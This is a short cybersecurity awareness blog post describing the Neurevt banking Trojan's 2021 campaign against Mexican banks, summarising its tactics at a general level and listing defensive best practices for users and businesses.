Trojan Malware: A Bank’s Worst Nightmare

Malware in Mexico

In August 2021, threat researchers from Cisco System’s Talos Intelligence Group announced that a new version of the Neurevt Trojan malware was wreaking havoc on Mexican banking institutions. In particular, this malware was found to have been attacking banking customers since June 2021 without detection. After compromising the systems, the Neurevt Trojan sought to empty customer accounts managed by some of the largest banks in Mexico, including Banorte, Bancomer, Santander, and Inbursa.  

The Neurevt (a.k.a Beta Bot) Trojan is nothing new to the world of cybersecurity - it was first discovered in 2013. Although this malware has largely always targeted financial institutions, it is constantly evolving and this newest version discovered by Cisco Talos constitutes as one of the most complex banking Trojans the industry has ever seen. Indeed, this new adaptation can penetrate secure systems, steal access credentials, spy on users, and extract sensitive data – all while avoiding detection.

What are banking Trojans and how do they attack networks?

A Trojan horse is a malware program that appears to be for a legitimate purpose, but secretly breaches the security of a computer system. Trojans take many forms and can even be embedded in seemingly harmless mobile apps such as flashlights, games, and messaging platforms. Banking Trojans are Trojan programs that specifically attack banks and other large financial services entities. Approximately 20 years ago, when online banking started to become more widely utilized, Trojans initially attacked the banks themselves. However, following the banks’ notable efforts to secure their internal systems, cybercriminals instead focused on the customers. Nowadays, personal financial information has become more digitized and integrated than ever, which means users are particularly vulnerable to cyberattacks.

Banking Trojans can hide on a system in several ways. Most Trojans gain initial access to a victim’s system through social engineering, such as spam or phishing emails. Then the Neurevt Trojan attacks using the following tactics:

1. Uses PowerShell to download files and send commands: In this first phase, Neurevt launches Powershell, which is a command line utility program used to automate or configure different tasks on the network. The Trojan uses Powershell to run different programs on the victim’s device.

2. Steals service token information: Next, Neurevt attempts to escalate its privileges on the system by stealing service token information. These tokens are granted by banking applications after a user’s credentials (such as username and password) are successfully authenticated by the server. Stealing these tokens allows Neurevt to acquire user credentials and access sensitive resources.

3. Utilizes spyware to monitor user activities: In this third stage, Neurevt leverages spyware, which is another type of malware which secretly monitors user activities without being detected. Specifically, the Neurevt Trojan records keystrokes, monitors screen and clipboard information, and takes screenshots of the victim’s computer.

4. Evades detection by modifying system settings: To avoid detection, Neurevt disables the system firewalls and changes the internet settings in the targeted device. This also helps ensure that it will be extremely difficult for threat analysts to attribute the attack to a specific criminal group following the incident.

5. Extracts data by communicating with remote servers: Finally, Neurevt steals the confidential financial data (also known as data exfiltration) by connecting to remote command and control (C&C or C2) servers. These C2 servers are used to send commands to compromised systems during cyber attacks.

Protecting Your Financial Information

Cyber breaches involving personal financial information can be devastating. Protecting digital banking data should be taken seriously by all users, especially now that we are heading towards an era in which nearly all financial transactions can be conducted via mobile phone.

Here are some best practices that the US Cybersecurity and Infrastructure Agency (CISA) has listed to help users secure their information and deter malicious hackers:

• Avoid clicking on any suspicious links or files in emails sent by unknown users.

• For businesses, conduct in-depth employee trainings so that all staff members recognize potentially suspicious emails.

• Always employ multi-factor authentication (MFA) when available.

• Install trustworthy antivirus and anti-malware software on all devices.

• Consistently patch and update all software and operating systems.

• Change passwords to network systems and accounts on a regular basis.

Interested in learning more about other types of malware? Check out our previous post, 7 Things You Should Know about Malware.